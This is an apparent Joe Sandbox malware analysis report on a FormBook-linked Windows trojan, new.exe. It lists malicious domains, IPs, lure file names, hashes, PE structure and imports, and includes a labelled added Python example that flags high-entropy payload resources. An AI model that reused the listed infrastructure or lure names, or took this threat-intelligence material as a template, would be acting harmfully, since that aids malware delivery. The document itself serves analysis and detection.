                                                Start date and time:2024-12-13 11:38:30 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 56s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:new.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@6/4
                                                EGA Information:
                                                • Successful, ratio: 66.7%
                                                HCA Information:
                                                • Successful, ratio: 94%
                                                • Number of executed functions: 51
                                                • Number of non-executed functions: 274
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50, 4.175.87.197
                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target lxdvPfMVsD.exe, PID 2540 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • VT rate limit hit for: new.exe
Time | Type | Description
05:40:59 | API Interceptor | 50x Sleep call for process: cttune.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
194.9.94.86
  PO 1202495088.exe | malicious | FormBook | www.milp.store/2j93/
  Hire P.O.exe | malicious | FormBook | www.deeplungatlas.org/57zf/
  Arrival Notice.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
  P1 HWT623ATG.bat.exe | malicious | FormBook, GuLoader | www.torentreprenad.com/r45o/
  BASF Purchase Order.doc | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
  TT-Slip.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
  Doc PI.doc | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
  Beauty_Stem_Invoice.doc | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
  MOQ010524Purchase order.doc | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
  SalinaGroup.doc | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
199.59.243.227
  PO 1202495088.exe | malicious | FormBook | www.sob.rip/tp8k/
  SH8ZyOWNi2.exe | malicious | CMSBrute | ww1.hbohbomax.com/
  ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | www.deadshoy.tech/0sq9/
  PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
  Need Price Order No.17084 PARLOK.exe | malicious | FormBook | www.solar-quotes.click/ubu8/
  DHL_734825510.exe | malicious | FormBook | www.whisperart.net/27s6/
  QUOTATON-37839993.exe | malicious | FormBook | www.sfantulandrei.info/wvsm/
  lgkWBwqY15.exe | malicious | FormBook | www.bcg.services/5onp/
  New quotation request.exe | malicious | FormBook | www.bcg.services/5onp/
  SRT68.exe | malicious | FormBook | www.acond-22-mvr.click/9qaj/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94950.bodis.com
  PO 1202495088.exe | malicious | FormBook | 199.59.243.227
  ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 199.59.243.227
  SHIPPING DOC.exe | malicious | FormBook | 199.59.243.227
  Purchase order MIPO2425110032.exe | malicious | FormBook | 199.59.243.227
  PI916810.exe | malicious | FormBook | 199.59.243.227
  SALES ORDER875.exe | malicious | FormBook | 199.59.243.227
  Invoice & Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
  Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
  Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
  OVERDUE BALANCE.exe | malicious | FormBook | 199.59.243.227
natroredirect.natrocdn.com
  PO 1202495088.exe | malicious | FormBook | 85.159.66.93
  RFQ_P.O.1212024.scr | malicious | FormBook | 85.159.66.93
  Nieuwebestellingen10122024.exe | malicious | FormBook | 85.159.66.93
  NEW.RFQ00876.pdf.exe | malicious | FormBook | 85.159.66.93
  DHL 40312052024.exe | malicious | FormBook | 85.159.66.93
  DHL 30312052024.exe | malicious | FormBook | 85.159.66.93
  rPaymentAdviceNote_pdf.exe | malicious | FormBook | 85.159.66.93
  lgkWBwqY15.exe | malicious | FormBook | 85.159.66.93
  SRT68.exe | malicious | FormBook | 85.159.66.93
  ek8LkB2Cgo.exe | malicious | FormBook | 85.159.66.93
x103.jieruitech.info
  PO 1202495088.exe | malicious | FormBook | 192.197.113.112
www.milp.store
  PO 1202495088.exe | malicious | FormBook | 194.9.94.86
Match | Associated Sample Name / URL | Detection | Threat Name | Context
LOOPIASE
  PO 1202495088.exe | malicious | FormBook | 194.9.94.86
  Hire P.O.exe | malicious | FormBook | 194.9.94.86
  Order.exe | malicious | FormBook | 194.9.94.85
  SDBARVe3d3.exe | malicious | FormBook | 194.9.94.85
  http://tokenpuzz1le.com/ | malicious | HTMLPhisher | 194.9.94.86
  Payment Advice.exe | malicious | FormBook | 194.9.94.85
  proforma invoice.exe | malicious | FormBook | 194.9.94.85
  Arrival Notice.exe | malicious | FormBook | 194.9.94.85
  shipping documents.exe | malicious | FormBook | 194.9.94.85
  MV Sunshine, ORDER.exe | malicious | FormBook | 194.9.94.85
BODIS-NJUS
  PO 1202495088.exe | malicious | FormBook | 199.59.243.227
  ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 199.59.243.227
  PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 199.59.243.227
  Need Price Order No.17084 PARLOK.exe | malicious | FormBook | 199.59.243.227
  http://doctifyblog.com | malicious | Unknown | 199.59.243.227
  DHL_734825510.exe | malicious | FormBook | 199.59.243.227
  QUOTATON-37839993.exe | malicious | FormBook | 199.59.243.227
  lgkWBwqY15.exe | malicious | FormBook | 199.59.243.227
  New quotation request.exe | malicious | FormBook | 199.59.243.227
  SRT68.exe | malicious | FormBook | 199.59.243.227
HKKFGL-AS-APHKKwaifongGroupLimitedHK
  360safe.exe | malicious | Unknown | 192.197.113.45
  1Eo0gOdDsV.exe | malicious | Quasar | 154.83.15.5
  FS04dlvJrq.exe | malicious | FormBook | 192.197.113.67
  botnet.mips.elf | malicious | Mirai, Moobot | 154.221.28.71
  mips.elf | malicious | Mirai | 154.221.30.1
  sh4.elf | malicious | Mirai | 154.221.30.6
  http://telegiraum.club/ | malicious | Telegram Phisher | 156.236.70.154
  http://telegiraum.club/ | malicious | Telegram Phisher | 156.236.70.154
  na.elf | malicious | Mirai | 194.120.230.54
  na.elf | malicious | Mirai | 194.120.230.54
                                                Process:C:\Windows\SysWOW64\cttune.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                Category:dropped
                                                Size (bytes):196608
                                                Entropy (8bit):1.1211596417522893
                                                Encrypted:false
                                                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                MD5:0AB67F0950F46216D5590A6A41A267C7
                                                SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\new.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):288768
                                                Entropy (8bit):7.995778617826198
                                                Encrypted:true
                                                SSDEEP:6144:FWiMG1QRIzXL820L1UF0f4i2pCM4Q/fqRcl7ljzruMZFAn:FWtEYtCF0V2pCEyR45HuM38
                                                MD5:1AF53DD67204A7A61D5FCD2517C8C04E
                                                SHA1:C6FB1299C1B3214099BB1667CC03EAA928391DC9
                                                SHA-256:900C7399457E3EE3E77F811C0725807C74F192287BB07BD2308148B5B996DC65
                                                SHA-512:136B89C35110F309EA498092D9993D6DC5D22CCFB33847DC63C5BD7BB346AAFBE6BAB93DDFF96353C51354D283317F0AEBCBAC612BB6A0F0CFEB3BBFADEBE7D7
                                                Malicious:false
                                                Reputation:low
                                                Preview:.m.PFD9HMFI2..LS.YCEG5PT.KMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HP.D9HGY.<C.E.u.B....<88m14X/"$).+((']7q.6t+6+g\>t...a+X,5kI4BmFI2CQLS-XJ.zU7.l+*.{W/._.s&..Y..h9$.]...m+*..^+8x$^.IFI2CQLS..CE.4QT.. F7HPED9H.FK3HPGST.GEG5PTQKMA.#HPET9HI6M2CQ.STICEG7PTWKMAF7HPCD9HIFI2C!HST[CEG5PTSK..F7XPET9HIFY2CALSTYCEW5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2m%)+ YCE.aTTQ[MAFaLPET9HIFI2CQLSTYCEg5P4QKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCE
                                                Process:C:\Users\user\Desktop\new.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):288768
                                                Entropy (8bit):7.995778617826198
                                                Encrypted:true
                                                SSDEEP:6144:FWiMG1QRIzXL820L1UF0f4i2pCM4Q/fqRcl7ljzruMZFAn:FWtEYtCF0V2pCEyR45HuM38
                                                MD5:1AF53DD67204A7A61D5FCD2517C8C04E
                                                SHA1:C6FB1299C1B3214099BB1667CC03EAA928391DC9
                                                SHA-256:900C7399457E3EE3E77F811C0725807C74F192287BB07BD2308148B5B996DC65
                                                SHA-512:136B89C35110F309EA498092D9993D6DC5D22CCFB33847DC63C5BD7BB346AAFBE6BAB93DDFF96353C51354D283317F0AEBCBAC612BB6A0F0CFEB3BBFADEBE7D7
                                                Malicious:false
                                                Preview:.m.PFD9HMFI2..LS.YCEG5PT.KMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HP.D9HGY.<C.E.u.B....<88m14X/"$).+((']7q.6t+6+g\>t...a+X,5kI4BmFI2CQLS-XJ.zU7.l+*.{W/._.s&..Y..h9$.]...m+*..^+8x$^.IFI2CQLS..CE.4QT.. F7HPED9H.FK3HPGST.GEG5PTQKMA.#HPET9HI6M2CQ.STICEG7PTWKMAF7HPCD9HIFI2C!HST[CEG5PTSK..F7XPET9HIFY2CALSTYCEW5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2m%)+ YCE.aTTQ[MAFaLPET9HIFI2CQLSTYCEg5P4QKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCE
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.190878324786299
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: new.exe
File size: 1'208'832 bytes
MD5: 8b86502f8b81e3335c1f4906c8acb9f7
SHA1: ac9ef49458da3e4075389da3f77ff001f0736852
SHA256: 4e1cfeb2023e96da3293df25bc81b3c51f2852eefb0cdfa4a17dc77b65da7c8f
SHA512: c9e4b1bd9bbcc5b7ce62d833c802e06667b17e1fb9d543a41b75d1427329730a2737ec6f59b13fa6f64959f49de370283c00a6bb51e1135f8a2e599ecc4b4eb7
SSDEEP: 24576:ku6J33O0c+JY5UZ+XC0kGso6FaXXrRsBoUFe+BPUJWY:eu0c++OCvkGs9FaXX1sBoUFe+BZY
TLSH: 7445CF2273DDC360CB669173BF69B7016EBF7C610630B85B2F980D7DA950162262D7A3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675B7E2D [Fri Dec 13 00:22:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
                                                Instruction
                                                call 00007F9CA8EA3A4Ah
                                                jmp 00007F9CA8E96814h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                push edi
                                                push esi
                                                mov esi, dword ptr [esp+10h]
                                                mov ecx, dword ptr [esp+14h]
                                                mov edi, dword ptr [esp+0Ch]
                                                mov eax, ecx
                                                mov edx, ecx
                                                add eax, esi
                                                cmp edi, esi
                                                jbe 00007F9CA8E9699Ah
                                                cmp edi, eax
                                                jc 00007F9CA8E96CFEh
                                                bt dword ptr [004C31FCh], 01h
                                                jnc 00007F9CA8E96999h
                                                rep movsb
                                                jmp 00007F9CA8E96CACh
                                                cmp ecx, 00000080h
                                                jc 00007F9CA8E96B64h
                                                mov eax, edi
                                                xor eax, esi
                                                test eax, 0000000Fh
                                                jne 00007F9CA8E969A0h
                                                bt dword ptr [004BE324h], 01h
                                                jc 00007F9CA8E96E70h
                                                bt dword ptr [004C31FCh], 00000000h
                                                jnc 00007F9CA8E96B3Dh
                                                test edi, 00000003h
                                                jne 00007F9CA8E96B4Eh
                                                test esi, 00000003h
                                                jne 00007F9CA8E96B2Dh
                                                bt edi, 02h
                                                jnc 00007F9CA8E9699Fh
                                                mov eax, dword ptr [esi]
                                                sub ecx, 04h
                                                lea esi, dword ptr [esi+04h]
                                                mov dword ptr [edi], eax
                                                lea edi, dword ptr [edi+04h]
                                                bt edi, 03h
                                                jnc 00007F9CA8E969A3h
                                                movq xmm1, qword ptr [esi]
                                                sub ecx, 08h
                                                lea esi, dword ptr [esi+08h]
                                                movq qword ptr [edi], xmm1
                                                lea edi, dword ptr [edi+08h]
                                                test esi, 00000007h
                                                je 00007F9CA8E969F5h
                                                bt esi, 03h
                                                jnc 00007F9CA8E96A48h
                                                Programming Language:
                                                • [ASM] VS2013 build 21005
                                                • [ C ] VS2013 build 21005
                                                • [C++] VS2013 build 21005
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ASM] VS2013 UPD4 build 31101
                                                • [RES] VS2013 build 21005
                                                • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5e864 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x126000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5e864 | 0x5ea00 | 1d11c1e815af3207fb1acccde6fe45c8 | False | 0.9301570756274768 | data | 7.90042965781924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x126000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x55b29 | data | | | 1.000330468324896
RT_GROUP_ICON | 0x1252e4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12535c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x125370 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x125384 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x125398 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x125474 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
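The section table flags .rsrc at entropy 7.90 with a ZLIB complexity of 0.93, and the resource table shows why: one 0x55b29-byte RT_RCDATA entry with complexity 1.0003, which zlib could not shrink at all, sits among icons, menus and strings that compress to a third of their size. That is the layout of a small native stub carrying a compressed or encrypted payload as a resource. The following is an added example, not code from the Joe Sandbox report: it recomputes both statistics and applies a triage rule to the report's own values for new.exe. Treating "ZLIB Complexity" as compressed size divided by raw size is an assumption, consistent with the values above 1.0 that the 20-byte RT_GROUP_ICON entries show (zlib framing overhead on tiny inputs); the 7.0 / 0.95 / 0x1000 thresholds are this example's, not the report's.

```python
"""Added example, not part of the Joe Sandbox report: recompute the two
statistics the section and resource tables rely on (Shannon entropy and
zlib compressibility) and apply a triage rule to the values the report
gives for new.exe."""
import math
import random
import zlib
from dataclasses import dataclass
from typing import List, Optional


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for a
    uniform one. Compressed or encrypted data sits close to 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Assumed definition of the report's 'ZLIB Complexity' column:
    compressed size divided by raw size. Already-compressed or encrypted
    bytes come out at or slightly above 1.0 (zlib framing overhead)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


@dataclass(frozen=True)
class Blob:
    """One PE section or resource with the columns the report provides.
    Resources have no entropy column, so entropy is optional."""
    name: str
    size: int
    complexity: float
    entropy: Optional[float] = None
    executable: bool = False


def looks_like_payload_container(b: Blob, min_size: int = 0x1000) -> bool:
    """Triage rule used here (thresholds are this example's): a non-executable
    blob of non-trivial size that is effectively incompressible (entropy >= 7.0
    or compressed/raw >= 0.95) is a likely container for a packed payload."""
    high_entropy = b.entropy is not None and b.entropy >= 7.0
    return (not b.executable and b.size >= min_size
            and (high_entropy or b.complexity >= 0.95))


def flag_payload_containers(blobs: List[Blob]) -> List[str]:
    return [b.name for b in blobs if looks_like_payload_container(b)]


# Values copied from the section table (raw size, ZLIB Complexity, Entropy)
# and from three rows of the resource table (size, ZLIB Complexity).
REPORT_SECTIONS = [
    Blob(".text", 0x8de00, complexity=0.5728679102422908, entropy=6.676118058520316, executable=True),
    Blob(".rdata", 0x2e200, complexity=0.33535526761517614, entropy=5.76010872795207),
    Blob(".data", 0x5200, complexity=0.1017530487804878, entropy=1.198745897703538),
    Blob(".rsrc", 0x5ea00, complexity=0.9301570756274768, entropy=7.90042965781924),
    Blob(".reloc", 0x7200, complexity=0.7650767543859649, entropy=6.779031650454199),
]
REPORT_RESOURCES = [
    Blob("RT_ICON@0xc99e8", 0x25a8, complexity=0.13858921161825727),
    Blob("RT_RCDATA@0xcf7b8", 0x55b29, complexity=1.000330468324896),
    Blob("RT_MANIFEST@0x125474", 0x3ef, complexity=0.5074478649453823),
]


def synthetic_check() -> dict:
    """Sanity-check both metrics on constructed buffers: all zeros, repeated
    ASCII, and a seeded pseudo-random stream standing in for ciphertext."""
    zeros = b"\x00" * 65536
    text = b"GET / HTTP/1.1\r\n" * 4096
    rng = random.Random(7)
    noise = bytes(rng.getrandbits(8) for _ in range(65536))
    return {
        name: (shannon_entropy(buf), zlib_complexity(buf))
        for name, buf in (("zeros", zeros), ("text", text), ("noise", noise))
    }


if __name__ == "__main__":
    for name, (ent, cplx) in synthetic_check().items():
        print(f"{name:6s} entropy={ent:.3f} zlib_complexity={cplx:.4f}")
    print("sections flagged:", flag_payload_containers(REPORT_SECTIONS))
    print("resources flagged:", flag_payload_containers(REPORT_RESOURCES))
```

Run stand-alone, the rule flags exactly .rsrc among the sections and exactly the RT_RCDATA entry among the three resources. Entropy alone is not a reliable discriminator for small blobs (a 20-byte resource cannot reach 8 bits per byte), which is why the rule also carries a size floor and the compressibility ratio.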
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
